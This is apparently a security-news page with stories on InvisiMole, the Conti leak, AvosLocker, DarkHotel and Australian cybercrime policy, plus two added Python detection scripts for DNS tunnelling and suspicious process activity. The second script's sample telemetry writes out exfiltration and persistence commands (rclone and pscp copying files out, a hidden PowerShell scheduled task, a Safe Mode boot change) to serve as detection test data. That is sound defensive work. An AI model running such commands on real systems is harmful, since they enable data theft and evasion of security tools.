More stories


    Ukraine warns of InvisiMole attacks tied to state-sponsored Russian hackers

    Ukrainian security officials have warned of ongoing attacks by InvisiMole, a hacking group with ties to the Russian advanced persistent threat (APT) group Gamaredon. 


    Last week, the Computer Emergency Response Team of Ukraine (CERT-UA) said it had been advised of new phishing campaigns against Ukrainian organizations that spread the LoadEdge backdoor. According to CERT-UA, the phishing emails carry an attached archive, 501_25_103.zip, containing a shortcut (LNK) file. If the shortcut is opened, an HTML Application (HTA) file downloads and executes VBScript that deploys LoadEdge.

    Once the backdoor has established a link to an InvisiMole command-and-control (C2) server, further payloads are downloaded and executed, including TunnelMole, which abuses the DNS protocol to build a tunnel for distributing additional malware, and RC2FM and RC2CL, both data-collection and surveillance backdoor modules. Persistence is maintained through the Windows registry.

    InvisiMole was first documented by ESET researchers in 2018. The threat actors have been active since at least 2013 and have been connected to attacks on "high-profile" organizations in Eastern Europe involved in military activities and diplomatic missions.

    In 2020, ESET researchers established a link between InvisiMole and Gamaredon/Primitive Bear, the latter of which appears to handle the initial infiltration of a network before InvisiMole begins its own operation.

    "We discovered InvisiMole's arsenal is only unleashed after another threat group, Gamaredon, has already infiltrated the network of interest, and possibly gained administrative privileges," ESET said at the time. "This allows the InvisiMole group to devise creative ways to operate under the radar."

    Palo Alto Networks has also been tracking Gamaredon, and in February said the APT had attempted to compromise an unnamed "Western government entity" in Ukraine through fake job listings.
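    As an added example, not CERT-UA's or ESET's tooling, here is a heuristic for spotting DNS-tunnelling traffic of the kind TunnelMole is described as producing. It runs over a constructed DNS query log, groups queries per client and registered domain, and flags domains whose subdomain labels are long, high-entropy and almost never repeated, as happens when a tunnel encodes chunks of data into query names. The log lines, client addresses, the cdn-upd.example domain and the thresholds are all assumptions for the example; a real deployment would use a Public Suffix List lookup rather than "last two labels" to find the registered domain.

```python
"""Heuristic DNS-tunnelling detector over a constructed DNS query log.

Added example, not CERT-UA's or ESET's tooling. Per (client, registered
domain) it measures how many distinct subdomains are queried, how long and
how random the leftmost label is, and what share of queries are TXT/NULL
(record types tunnels favour for downstream data). The thresholds below are
assumptions, not published detection values.
"""
import math
from collections import defaultdict

# Constructed sample log (not real traffic): "<timestamp> <client> <qtype> <qname>".
# The cdn-upd.example domain and the client addresses are hypothetical.
SAMPLE_LOG = """\
2022-03-18T10:00:01Z 10.0.0.5 A www.example.com
2022-03-18T10:00:03Z 10.0.0.5 A mail.example.com
2022-03-18T10:00:05Z 10.0.0.5 A www.example.com
2022-03-18T10:00:06Z 10.0.0.5 A api.example.com
2022-03-18T10:00:08Z 10.0.0.5 A www.example.com
2022-03-18T10:00:09Z 10.0.0.5 A mail.example.com
2022-03-18T10:01:00Z 10.0.0.5 TXT 0123456789abcdeffedcba9876543210.cdn-upd.example
2022-03-18T10:01:01Z 10.0.0.5 TXT 13579bdf02468aceeca86420fdb97531.cdn-upd.example
2022-03-18T10:01:02Z 10.0.0.5 A fedcba98765432100123456789abcdef.cdn-upd.example
2022-03-18T10:01:03Z 10.0.0.5 TXT 02468ace13579bdffdb97531eca86420.cdn-upd.example
2022-03-18T10:01:04Z 10.0.0.5 TXT 0f1e2d3c4b5a69788796a5b4c3d2e1f0.cdn-upd.example
2022-03-18T10:01:05Z 10.0.0.5 A a1b2c3d4e5f6078998706f5e4d3c2b1a.cdn-upd.example
2022-03-18T10:01:06Z 10.0.0.5 TXT 9876543210fedcbaabcdef0123456789.cdn-upd.example
2022-03-18T10:01:07Z 10.0.0.5 TXT 5a6b7c8d9e0f12344321f0e9d8c7b6a5.cdn-upd.example
2022-03-18T10:02:00Z 10.0.0.9 A 0123456789abcdeffedcba9876543210.cdn-upd.example
2022-03-18T10:02:01Z 10.0.0.9 A 13579bdf02468aceeca86420fdb97531.cdn-upd.example
"""


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; encoded/encrypted data scores high."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    # Assumption: the registered domain is the last two labels (no PSL lookup).
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def parse_log(text: str):
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip blank or malformed lines
        ts, client, qtype, qname = parts
        records.append({"ts": ts, "client": client,
                        "qtype": qtype.upper(), "qname": qname.lower()})
    return records


def score(records):
    """Per (client, registered domain) metrics over the leftmost label."""
    groups = defaultdict(list)
    for r in records:
        groups[(r["client"], registered_domain(r["qname"]))].append(r)
    metrics = {}
    for key, recs in groups.items():
        labels = [r["qname"].rstrip(".").split(".") for r in recs]
        subs = [l[0] if len(l) > 2 else "" for l in labels]
        n = len(recs)
        metrics[key] = {
            "queries": n,
            "unique_ratio": len(set(subs)) / n,
            "mean_label_len": sum(len(s) for s in subs) / n,
            "mean_entropy": sum(shannon_entropy(s) for s in subs) / n,
            "txt_ratio": sum(r["qtype"] in ("TXT", "NULL") for r in recs) / n,
        }
    return metrics


def detect_tunnels(text: str, min_queries=6, min_unique_ratio=0.8,
                   min_label_len=20, min_entropy=3.0):
    """Return one alert per (client, domain) that trips every threshold."""
    alerts = []
    for (client, domain), m in score(parse_log(text)).items():
        if (m["queries"] >= min_queries
                and m["unique_ratio"] >= min_unique_ratio
                and m["mean_label_len"] >= min_label_len
                and m["mean_entropy"] >= min_entropy):
            alerts.append({"client": client, "domain": domain, **m})
    return alerts


if __name__ == "__main__":
    for a in detect_tunnels(SAMPLE_LOG):
        print(f"{a['client']} -> {a['domain']}: {a['queries']} queries, "
              f"label len {a['mean_label_len']:.0f}, entropy {a['mean_entropy']:.2f}, "
              f"TXT share {a['txt_ratio']:.2f}")
```

    Requiring all four thresholds at once keeps legitimate CDN and anti-spam lookups, which also produce long labels but repeat them and rarely use TXT, from tripping the rule; the query-count floor keeps a single odd lookup from alerting on its own. The second client in the sample shows that floor in action: it queries the same tunnel domain but only twice, so it is not reported.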
    CERT-UA has also begun tracking the activities of Vermin/UAC-0020, a group that has been attempting to break into the systems of Ukrainian state authorities. Vermin has been using the topic of supplies as a spear-phishing lure; the emails contain a letter and a password-protected archive holding the Spectr malware.

    In 2018, ESET and Palo Alto Networks published research on Vermin, a group that has been publicly tracked for at least four years and whose activity may date back as far as 2015. Vermin targeted Ukrainian government institutions from the outset, with the remote access Trojans (RATs) Quasar, Sobaken, and Vermin as its tools of choice. While the Quasar and Sobaken variants were compiled from freely available open source code, Vermin is described as a "custom-made" RAT capable of data exfiltration, keylogging, audio recording, and credential theft.

    In related news this month, Aqua Security's Team Nautilus said that public cloud repositories are being used to host resources on both sides of the war, with Ukraine's call for an "IT Army" of volunteers acting as a catalyst for public tools used to launch denial-of-service (DoS) attacks against Russian online services.

    It is not just RATs and surveillance malware that Ukrainian organizations have to contend with. ESET has detected three forms of wiper malware, designed to destroy files and resources rather than to steal information or spy on victims, in as many weeks. The latest, dubbed CaddyWiper, has been found "on a few dozen systems in a limited number of organizations," according to ESET.

    Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0


    New Conti ransomware source code leaked

    New versions of Conti’s ransomware source code have been reportedly leaked by a researcher displeased with the group’s public declaration of support to Russia. 

    As reported by Bleeping Computer, a cybersecurity researcher took umbrage when the cybercriminals publicly said they supported Russia's invasion of Ukraine. In revenge, the individual, believed to hail from Ukraine, has been giving the ransomware operators a taste of their own medicine.

    Conti is a Russian-speaking ransomware group that also operates a ransomware-as-a-service (RaaS) business model. While some ransomware payments run into the millions, Coveware estimates that the average demand made by Conti members is just over $765,000.

    Over the weekend, a link to the new package was published under the "Conti Leaks" Twitter handle. The source code has been uploaded to VirusTotal; while the archive is password-protected, the password is available to cybersecurity teams. Previously, the same pro-Ukraine individual leaked an older version of the ransomware.

    Stealing and releasing the ransomware's source code gives cybersecurity researchers and vendors the opportunity to analyze the malware and potentially create denylists, defenses, and decryptors. On the flip side, attackers could also grab and adapt the code for their own campaigns.

    Conti's declaration of support for Russia's invasion of Ukraine also led to the leak of the group's internal chat logs. According to the logs, Conti is made up of individuals tasked with different duties, including malware coders, testers, system administrators and "HR" personnel who handle hires, as well as negotiators who deal with victims and try to ensure a blackmail payment is made.

    Check Point researchers analyzed the leaked data and came to an interesting conclusion about Conti's hiring process: while some members are recruited through underground forums, others aren't even told that they are interviewing with cybercriminals. Instead, some potential hires were told they would be helping to develop software for legitimate penetration testers and analytics.

    Conti is known for its devastating cyberattack on Ireland's Health Service Executive (HSE) in May 2021; while the HSE refused to pay the millions of dollars demanded, reports suggested it is footing a recovery bill of over $48 million.

    The US Cybersecurity and Infrastructure Security Agency (CISA) and the FBI have previously warned organizations of Conti activity, and hundreds of organizations in the United States alone are estimated to have fallen prey to the group. Last week, Google exposed the inner workings of Exotic Lily, an initial access broker (IAB) that sells network access to threat groups including those behind Conti and Diavol.


    FBI warning: This ransomware uses DDoS to threaten victims. Here's what to watch out for

    AvosLocker, a ransomware-as-a-service (RaaS) operation that launched in July 2021, continues to attack US critical infrastructure, the US Federal Bureau of Investigation (FBI) has warned in an advisory. According to the FBI, the AvosLocker gang has targeted US victims in financial services, critical manufacturing, and government facilities.


    "AvosLocker claims to directly handle ransom negotiations, as well as the publishing and hosting of exfiltrated victim data after their affiliates infect targets," the FBI's Internet Crime Complaint Center (IC3) reports.

    AvosLocker appeared on the ransomware scene last year, notably running the AnyDesk remote administration tool in Windows Safe Mode to bypass anti-malware software. Palo Alto Networks assessed AvosLocker to be a marketing-savvy operation, based on the "press releases" it publishes on dark web forums to threaten victims and attract affiliates.

    "AvosLocker offers technical support to help victims recover after they've been attacked with encryption software that the group claims is 'fail-proof,' has low detection rates and is capable of handling large files," Palo Alto Networks said. The gang claims to have hit organizations in the US, the UK, the UAE, Belgium, Spain and Lebanon, with ransom demands ranging from $50,000 to $75,000.

    AvosLocker's operators prefer ransom payments in Monero, a privacy-focused alternative to Bitcoin, but also accept Bitcoin at a 10% to 25% premium over the current US dollar price, according to the FBI. The agency also warns that, unusually, the gang may phone victims to pressure them into a deal.

    "In some cases, AvosLocker victims receive phone calls from an AvosLocker representative. The caller encourages the victim to go to the onion site to negotiate and threatens to post stolen data online. In some cases, AvosLocker actors will threaten and execute distributed denial-of-service (DDoS) attacks during negotiations," the FBI said. DDoS capability is unfortunately readily available, cheap and powerful.

    The Windows AvosLocker executable is written in C++ and runs as a console application that logs its actions on the victim's machine and lets the attacker remotely enable or disable "certain features".
    AvosLocker runs a double-extortion racket: the attackers both steal and encrypt data, then threaten to leak the stolen contents via a website to pressure victims into paying. The gang has also started auctioning leaked data to cash in when a ransom negotiation fails, a tactic borrowed from the notorious REvil ransomware gang.

    Tools AvosLocker has been observed using include the Cobalt Strike pen-testing and post-exploitation toolkit, encoded PowerShell, the PuTTY Secure Copy client "pscp.exe", Rclone, AnyDesk, Scanner, Advanced IP Scanner, and WinLister, according to the FBI document. The group also exploits the Microsoft Exchange Server ProxyShell chain (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207), patched in 2021, as well as the earlier ProxyLogon bug CVE-2021-26855. The FBI notes, however, that exactly how the attackers breach a target's network depends on the skills of the AvosLocker affiliate carrying out the attack.

    The FBI's advisory is another arm of the US government's effort, via the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA), to urge all organizations to patch everything and bolster their cybersecurity amid fears that Russian state-sponsored hackers will target US organizations with destructive malware in response to Western sanctions over the invasion of Ukraine.


    Suspected DarkHotel APT resurgence targets luxury Chinese hotels

    A new wave of activity suspected to be the work of the DarkHotel advanced persistent threat (APT) group has been disclosed by researchers. Last week, Trellix researchers Thibault Seret and John Fokker said that a malicious campaign has been targeting luxury hotels in Macao, China since November 2021, and based on clues in the attack vector and the malware used, the team suspects DarkHotel is the culprit.

    DarkHotel is a South Korean APT that uses tailored spear-phishing attacks. The group has been active against the hospitality, government, automotive, and pharmaceutical industries since at least 2007 and tends to focus on surveillance and data theft, with business and industry leaders as its targets.

    If you're looking to compromise high-value targets such as CEOs and other executives, it makes sense to target the high-end venues they are likely to book. According to Trellix, major hotels in Macao, China, including the Grand Coloane Resort and Wynn Palace, are now among the APT's victims.

    DarkHotel's campaign began with a spear-phishing email, made to appear to come from the "Macao Government Tourism Office", sent to management staff in the luxury hotels, including front office and HR employees likely to have access to guest booking systems. The emails contained an Excel sheet lure requesting completion of a form for a guest inquiry; if the victim enables macros in order to read the document, the macros trigger the download and execution of malware payloads.

    Once the researchers peeled back layers of obfuscation, they found a function that creates a scheduled task for persistence and launches VBS and PowerShell scripts to connect to a hard-coded command-and-control (C2) server disguised as a service belonging to the Federated States of Micronesia. The attack chain shares a number of similarities, including the IP address and C2 infrastructure in use, with a campaign documented by Zscaler in 2021.
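    As an added example, not the FBI's, Trellix's or any vendor's tooling, the following hunt turns the two intrusion patterns described on this page into rules over process-creation telemetry: an Office application spawning a script host and scheduled-task creation for persistence (the DarkHotel macro chain above), and execution of pscp.exe, Rclone or AnyDesk together with a Safe Mode boot configuration (the AvosLocker tooling described in the FBI advisory). The events are constructed in the style of Sysmon Event ID 1, with hypothetical hostnames, paths and a documentation-range IP address; the bcdedit safeboot check is an assumption about how a Safe Mode boot would be forced, since the reporting only says AnyDesk was run in Safe Mode.

```python
"""Process-creation hunt over constructed endpoint telemetry.

Added example; not FBI, Trellix or vendor tooling. Events are modelled on
Sysmon Event ID 1 fields (parent image, image, command line) and are
entirely constructed. Rules:

  office_spawns_script    Office app launching a script host (macro lure)
  scheduled_task_created  schtasks.exe /create used for persistence
  safeboot_config         bcdedit.exe configuring a Safe Mode boot (assumption:
                          the usual way to force Safe Mode; the reporting only
                          says AnyDesk was run in Safe Mode)
  exfil_tool              pscp.exe / rclone.exe execution
  remote_admin_tool       AnyDesk execution
"""
import json
from collections import defaultdict

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe",
                "cmd.exe", "schtasks.exe", "rundll32.exe"}
EXFIL_TOOLS = {"pscp.exe", "rclone.exe"}
REMOTE_ADMIN_TOOLS = {"anydesk.exe"}

# Constructed sample events (JSON lines). Hostnames, paths and the 203.0.113.5
# address are hypothetical (203.0.113.0/24 is a documentation range).
SAMPLE_EVENTS = r"""
{"ts": "2022-03-21T09:12:01Z", "host": "FO-PC07", "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "cmdline": "wscript.exe //B C:\\Users\\fo\\AppData\\Local\\Temp\\inquiry.vbs", "image": "C:\\Windows\\System32\\wscript.exe"}
{"ts": "2022-03-21T09:12:02Z", "host": "FO-PC07", "parent": "C:\\Windows\\System32\\wscript.exe", "cmdline": "schtasks.exe /Create /SC MINUTE /MO 30 /TN OfficeUpdate /TR \"powershell -w hidden -ep bypass -f C:\\Users\\fo\\AppData\\Local\\Temp\\upd.ps1\"", "image": "C:\\Windows\\System32\\schtasks.exe"}
{"ts": "2022-03-21T09:15:40Z", "host": "FO-PC07", "parent": "C:\\Windows\\explorer.exe", "cmdline": "chrome.exe", "image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"}
{"ts": "2022-03-21T22:01:10Z", "host": "SRV-FS01", "parent": "C:\\Windows\\System32\\cmd.exe", "cmdline": "bcdedit.exe /set {default} safeboot network", "image": "C:\\Windows\\System32\\bcdedit.exe"}
{"ts": "2022-03-21T22:03:55Z", "host": "SRV-FS01", "parent": "C:\\Windows\\System32\\cmd.exe", "cmdline": "rclone.exe copy D:\\Shares\\Finance remote:staging --transfers 8", "image": "C:\\ProgramData\\rclone.exe"}
{"ts": "2022-03-21T22:06:12Z", "host": "SRV-FS01", "parent": "C:\\Windows\\System32\\services.exe", "cmdline": "AnyDesk.exe", "image": "C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe"}
{"ts": "2022-03-22T01:44:09Z", "host": "WS-HR02", "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "pscp.exe -pw ******** -r C:\\HR\\Exports user@203.0.113.5:/tmp/hr", "image": "C:\\Users\\Public\\pscp.exe"}
{"ts": "2022-03-22T08:00:00Z", "host": "WS-HR02", "parent": "C:\\Windows\\explorer.exe", "cmdline": "schtasks.exe /Query /TN OfficeUpdate", "image": "C:\\Windows\\System32\\schtasks.exe"}
"""


def basename(path: str) -> str:
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawns_script(ev) -> bool:
    return basename(ev["parent"]) in OFFICE_APPS and basename(ev["image"]) in SCRIPT_HOSTS


def scheduled_task_created(ev) -> bool:
    # /query, /delete etc. are routine; only task creation is interesting here
    return basename(ev["image"]) == "schtasks.exe" and "/create" in ev["cmdline"].lower()


def safeboot_config(ev) -> bool:
    return basename(ev["image"]) == "bcdedit.exe" and "safeboot" in ev["cmdline"].lower()


def exfil_tool(ev) -> bool:
    return basename(ev["image"]) in EXFIL_TOOLS


def remote_admin_tool(ev) -> bool:
    return basename(ev["image"]) in REMOTE_ADMIN_TOOLS


RULES = [
    ("office_spawns_script", office_spawns_script),
    ("scheduled_task_created", scheduled_task_created),
    ("safeboot_config", safeboot_config),
    ("exfil_tool", exfil_tool),
    ("remote_admin_tool", remote_admin_tool),
]


def parse_events(text: str):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def hunt(text: str):
    """Evaluate every rule against every event; one finding per (event, rule) hit."""
    findings = []
    for ev in parse_events(text):
        for name, pred in RULES:
            if pred(ev):
                findings.append({"rule": name, "host": ev["host"], "ts": ev["ts"],
                                 "image": basename(ev["image"]), "cmdline": ev["cmdline"]})
    return findings


def summarize(findings):
    """Map host -> sorted list of distinct rules it tripped, for triage."""
    by_host = defaultdict(set)
    for f in findings:
        by_host[f["host"]].add(f["rule"])
    return {host: sorted(rules) for host, rules in by_host.items()}


if __name__ == "__main__":
    results = hunt(SAMPLE_EVENTS)
    for f in results:
        print(f"{f['ts']} {f['host']:8} {f['rule']:22} {f['cmdline']}")
    print(summarize(results))
```

    Matching on the image file name alone is deliberately loose: affiliates rename pscp.exe or Rclone, so a production rule would add the original file name or a hash from the telemetry, while the host-level summary is what makes a single Safe Mode reconfiguration stand out when it lands on the same server that is also copying a file share out with Rclone.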
    Normally, you would expect the APT to then execute further payloads for credential harvesting and data theft. In this campaign, however, activity suddenly stopped in January.

    "We suspect the group was trying to lay the foundation for a future campaign involving these specific hotels," Trellix said. "After researching the event agenda for the targeted hotels, we did indeed find multiple conferences that would have been of interest to the threat actor. […] But even threat actors will get unlucky. Due to the rapid rise of COVID-19 in Macao and in China in general, most of [the] events were canceled or postponed."

    Trellix attributes the attacks to DarkHotel with "moderate" confidence, based on IP addresses already linked to the APT and "known development patterns" found in the malware's C2 server. However, the team acknowledges that this may not be enough for full attribution, especially as some threat groups are known to plant false flags so that the cybersecurity community ascribes their work to another group, letting them stay under the radar.

    "Regardless of the exact threat actor attribution, this campaign demonstrates that the hospitality sector is indeed a valid target for espionage operations," the researchers say. "Executives should be aware that the (cyber) security of their respective organizations doesn't stop at the edge of their network."

    Back in 2020, Qihoo 360 attributed an ongoing wave of cyberattacks against Chinese government agencies and their employees to the APT. The researchers said a zero-day vulnerability was used to compromise at least 200 Sangfor SSL virtual private network (VPN) servers, many of them used by government entities in Beijing and Shanghai, as well as departments involved in Chinese diplomacy.
    While the COVID-19 pandemic has severely disrupted the travel industry, and the rising cost of both living and transport may keep tourists away for longer, threat actors will continue to try to obtain valuable information from hotels and their guests.

    When you're on the road, keep to basic security standards: you can't prevent incidents such as the compromise of a hotel's point-of-sale (PoS) systems, but using mobile networks rather than public Wi-Fi hotspots, using a virtual private network (VPN), and keeping software fully updated are all recommended.


    Australia pledges new powers for combatting online disinformation

    The Australian federal government has pledged new laws to crack down on the spread of harmful disinformation and misinformation on social media. Under the proposed laws, the Australian Communications and Media Authority (ACMA) would gain an expanded set of powers for enforcing voluntary industry codes of practice should platforms' own actions prove inadequate.

    "This will encourage platforms to be ambitious in addressing the harms of disinformation and misinformation, while providing ACMA with the ability to hold platforms to account should their voluntary efforts prove inadequate or untimely," Communications Minister Paul Fletcher said.

    The announcement of these laws comes a year after large digital platforms, including Facebook, Google, TikTok, and Twitter, launched a voluntary code of practice for addressing misinformation online. Since the voluntary code's launch, the federal government has repeatedly criticised the efforts of social media platforms to address misinformation and disinformation. Australian Prime Minister Scott Morrison last year criticised tech giants for the conduct that occurs on their platforms, stating that social media platforms like Facebook have become a "coward's palace" for trolls.

    Beyond new powers for scrutinising the voluntary code, the laws also look to give ACMA new information-gathering powers to improve access to Australian-specific data about measures for addressing disinformation and misinformation.

    "Digital platforms must take responsibility for what is on their sites and take action when harmful or misleading content appears," Fletcher said.
    "This is our government's clear expectation — and just as we have backed that expectation with action in recently passing the new Online Safety Act, we are taking action when it comes to disinformation and misinformation."

    In addition, the federal government wants to establish a misinformation and disinformation action group to bring together key stakeholders across government and the private sector to collaborate and share information on emerging issues and best-practice responses. The laws were created off the back of recommendations made by ACMA, which found most Australians are concerned about, and have experienced, online misinformation.

    As for when the laws will be tabled, Fletcher has said the online disinformation legislation will not be introduced into Parliament ahead of the upcoming federal election. Instead, the communications minister has given a timeline of sometime in the second half of this year.


    Australia launches federal cybercrime centre as part of national plan

    Australian Home Affairs Minister Karen Andrews has launched a centre to bolster the country's cybercrime-fighting efforts. The AU$89 million cybercrime centre forms part of Home Affairs' national plan to combat cybercrime, which was announced alongside the centre's launch on Monday morning. The AU$89 million comes from the AU$1.67 billion the federal government has allocated to Australia's cybersecurity strategy.

    Andrews said the national plan and the Australian Federal Police's (AFP) new cybercrime centre, the Joint Policing Cybercrime Coordination Centre (JPC3), would bring together the experience, powers, capabilities, and intelligence needed to build a strong, multi-faceted response.

    "Using far-reaching Commonwealth legislation and high-end technical capabilities, the AFP's new cybercrime centre will aggressively target cyber threats, shut them down, and bring offenders to justice," Andrews said.

    "During the pandemic, cybercrime became one of the fastest-growing and most prolific forms of crime committed against Australians. The tools and the techniques used to rob or extort Australians became more effective and more freely available than ever before."

    Home Affairs first announced the centre was being developed back in November, at the time explaining the AFP would use the centre to focus specifically on preventing cybercriminals from scamming, stealing from, and defrauding Australians. Based in the AFP's New South Wales headquarters, JPC3's operations will be led by AFP assistant commissioner Justine Gough, the AFP's first full-time executive dedicated to countering cybercrime.

    Under the national cybercrime plan, Home Affairs envisions governments at all levels operating within a cybercrime-fighting framework built on three pillars: preventing and protecting against cybercrime; investigating, disrupting, and prosecuting cybercrime; and helping victims recover from cybercrime incidents.
    Alongside the launch of the cybercrime centre, the plan also sets a goal of establishing a national cybercrime forum that brings together representatives from Commonwealth, state and territory justice departments, law enforcement agencies and regulators, such as the Office of the eSafety Commissioner, to develop a national cybercrime action plan.

    Last month, Home Affairs introduced three new Bills into Parliament, covering the federal government's ransomware action plan, critical aviation and marine cybersecurity, and mobile phone access in prisons. The department is also pushing for a second tranche of cyber laws aimed at critical infrastructure sectors, currently under review by a parliamentary committee, to become law. Labelled by Home Affairs Secretary Mike Pezzullo last month as the government's defence against cyber threats, the second tranche is intended to create a standardised critical infrastructure framework for Australia's intelligence agencies.


    We are headed for an ecosystem of cyber haves and cyber nots: Cisco advisory CISO

    When policy makers are dreaming about how cybersecurity will be handled in the future, it consists of governments issuing warnings to organisations, the community sharing intel with each other in real time, and the ecosystem being able to respond with a degree of unanimity.

    For Cisco advisory CISO Helen Patton, that dream leaves out the many organisations struggling beneath the security poverty line.

    "We've got a lot of organisations that don't have the resources to be able to participate in that kind of environment. They've got old pieces of equipment, they don't do automation, they don't have the resources to make it happen, they're never going to engage in that kind of environment," Patton told ZDNet.

    "Maybe the financial sector, maybe the big companies that have got a lot of money that they can throw at this problem, might engage. But now you're into these two tiers of security, we've got the upper tier that can take advantage of machine learning and artificial intelligence, and real-time info share.

    "And we've got everybody else who is hoping that some kid on a keyboard can do something about it, and obviously they won't be able to. We will have a bifurcated security community is what we will end up with."

    One way to lift those at the bottom is something akin to a co-operative, with Patton describing a community that shares resources and uses purchasing consortiums, alongside governments using the tools at their disposal to help under-resourced organisations help themselves.

    Patton previously spent a decade at JPMorgan Chase, and said even in banking it sometimes felt as though more security resources were needed.

    "I don't know of anyone in any size organisation that feels like they've got everything they need, but I do think we need leadership to understand when they make a risk-based decision to put money in one area and not in security that they are taking a gamble, that they are making a choice that could lead to a real problem for them operationally," she said.

    To help boards get to proper grips with risk and cybersecurity, Patton believes governments need to consider legislating a requirement for boards to have someone who understands technology and risk, and that governments should be trying to inform the C-suite, not security professionals.

    "When AWS burps and half of social media goes out … do our CEOs and boards really understand that? No, they don't," Patton said.

    "We've got to get them educated on that. And the guy who's trying to run a security program with one other guy and a dog doesn't have time to sit and educate the board. The government does.

    "Stop training security people about how to do security better with no resources, and start training CEOs on how to think and manage the systemic risk, that's what they should be doing."

    Following the legal requirements on breach reporting imposed by governments, it should come as no surprise that lawyers are getting involved in the process, and Patton says CISOs are having to work out how to manage risk while meeting requirements that treat all breaches as equally bad.

    "We're seeing CISOs separate themselves operationally from the reporting requirements," Patton said.

    "So now we've got lawyers who are making a decision about whether something is material enough to require a report, which is not really the spirit of the regulation. But I've seen it in Australia, and I'm seeing it overseas as well.

    "This is a coping mechanism because the reporting requirements are sort of vague."

    The advisory CISO said reporting demands mean that if an incident is in a low-risk area, no security lead is going to tell lawyers or regulators they were going to sit on it because it was assessed as low risk, as compared to critical infrastructure elsewhere.

    "These reporting requirements that say you've got 72 hours or 48 hours will generate a lot of inaccurate noise, that both the governments and the organisations will then have to unpick after the fact, once they have more information. There's going to be a lot of misinformation that goes out into the environment because of the short windows that we're [dealing] with, it's a challenge," Patton said.

    "It's not until you've had a certain amount of time to explore the incident, respond to the incident, learn from the incident that you really have good quality information. But our regulators want us to tell them immediately when something looks funny. And there's lots of things that look funny in our environments, because our environments they're inherently odd.

    "They're going to get a lot of really bad signals early on, and we're going to have to work out how do you talk about that publicly when the information is really asymmetrical in terms of what you know, and what's actually happening. It's a problem."

    ZDNet's Monday Morning Opener is our opening take on the week in tech, written by members of our editorial team. We're a global team, so this editorial publishes on Monday at 8:00am AEST in Sydney, Australia, which is 6:00pm Eastern Time on Sunday in the US, and 10:00PM GMT in London.


    Franchises, partnerships emerge in Ransomware-as-a-Service operations

    Over the past year, many ‘franchise’ deals and new partnerships have emerged in the Ransomware-as-a-Service (RaaS) industry. 


    RaaS has arguably become one of the most prolific and dangerous threats to enterprise security today. Cybercriminals have worked out that they can make serious profits from leasing out their ransomware creations, especially when the malware is used against large companies able to pay high "ransom" payments to have their data decrypted after a successful infection. The industry has also evolved over recent years to include other roles: malware developers, native speakers of a language who can manage negotiations, and Initial Access Brokers (IABs) who sell network access to a target, speeding up RaaS operations.

    Leak sites, too, are now common. When a ransomware group attacks a victim, it may steal sensitive corporate information before encrypting systems. The cybercriminals then threaten to publish this data unless a payment is made.

    On Friday, KELA published a report on ransomware operators' overall trends and movements over 2021. The cybersecurity firm says that the number of major organizations tracked as ransomware victims increased from 1,460 to 2,860, with many appearing on ransomware leak sites and negotiation platforms.

    In total, 65% of the leak sites monitored last year were managed by new players on the scene. The majority of targets are based in developed nations, including the US, Canada, Germany, Australia, Japan, and France. Manufacturing, industrial companies, professional services, technology, engineering, and retail are among the sectors most at risk of being targeted by ransomware operators.

    However, once a company has been breached, this does not mean that the security headache is restricted to a single incident. As an example, Party Rental appeared on Avaddon's leak site in February 2021, and Conti allegedly claimed the same victim in September. Both groups shared data belonging to the company. Amey, too, appeared on Mount Locker's domain and then Clop's. According to KELA, roughly 40 organizations compromised in 2020 were then hit by a separate ransomware group last year, and "it is possible the groups used the same initial access vector."

    "Operators of data leak sites, namely Marketo and Snatch, frequently claimed the same victims as many ransomware groups (Conti, Ragnar Locker, and more), hinting about possible collaboration," the report says.

    Over 1,300 access listings were posted in the underground by at least 300 IABs over 2021. LockBit, Avaddon, DarkSide, Conti, and BlackByte are among the Russian-speaking ransomware operators who frequently purchase access.

    While some overlapping intrusions may be coincidental, it does appear that "franchise" businesses are emerging. Trend Micro previously connected the dots between Astro Team and Xing Team, both of which were allowed to use the Mount Locker ransomware under their own brand names. The same malware was in use, while each cybercriminal group maintained its own name-and-shame blog. Some of the victims were duplicated across the Astro/Xing Team and Mount Locker disclosures. In addition, 14 victim organizations were published on the Quantum, Marketo, and Snatch blogs in 2021.

    "Collaboration can mean that ransomware operators share stolen data with actors behind data leak sites on specific conditions," the researchers say. "For operators, it can mean additional profits if the data is sold on a data leak site or simply more intimidating to the victim (or future victims). Aside from collaboration, as between ransomware groups, actors behind these data leak sites can use the same entry vector or attack the same company via different initial access."

    Some of the major ransomware players vanished in 2021, including BlackMatter and REvil, although they may re-emerge under different brands. New groups including Alphv, Hive, and AvosLocker have emerged to fill the gap.